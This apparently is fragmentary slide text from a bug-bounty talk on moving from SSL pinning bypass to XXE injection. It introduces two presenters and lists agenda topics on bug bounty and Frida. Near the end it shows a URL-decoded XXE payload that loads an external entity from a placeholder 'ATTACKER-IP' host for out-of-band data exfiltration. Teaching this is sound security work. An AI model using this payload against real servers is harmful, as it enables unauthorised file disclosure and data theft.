From SSL Pinning Bypass To Xxe Injection
From SSL Pinning Bypass To Xxe Injection
to XXE Injection
I
1
$ curl https://who.are.we/api/v3/users | json_pp
{
"spenkk": {
"Name": "Arben Shala",
"Work": {
"Novus": "Cybersecurity Engineer",
"Hackerone": "Part-Time Bug Bounty Hunter"
}
I },
"0xcela": {
"Name": "Çlirim Emini",
"Work": {
"Cobalt Core": "Penetration Tester",
"Synack Red Team": "Bug Bounty Hunter",
"Hackerone": "Bug Bounty Hunter"
}
}
}
2
Intro to Bug
Bounty
- Benefits
- Pentest vs Bug Bounty
- Where should I start?
https://spenkk.github.io/
- What is Frida?
- Why is mainly used for
Android testing?
URL Decoded:
XMLDOC=<?xml version="1.0"?><!DOCTYPE convert [ <!ENTITY %
remote SYSTEM "http://ATTACKER-IP/">%remote;%int;%trick;]>
Your Company Name 11
XXE Injection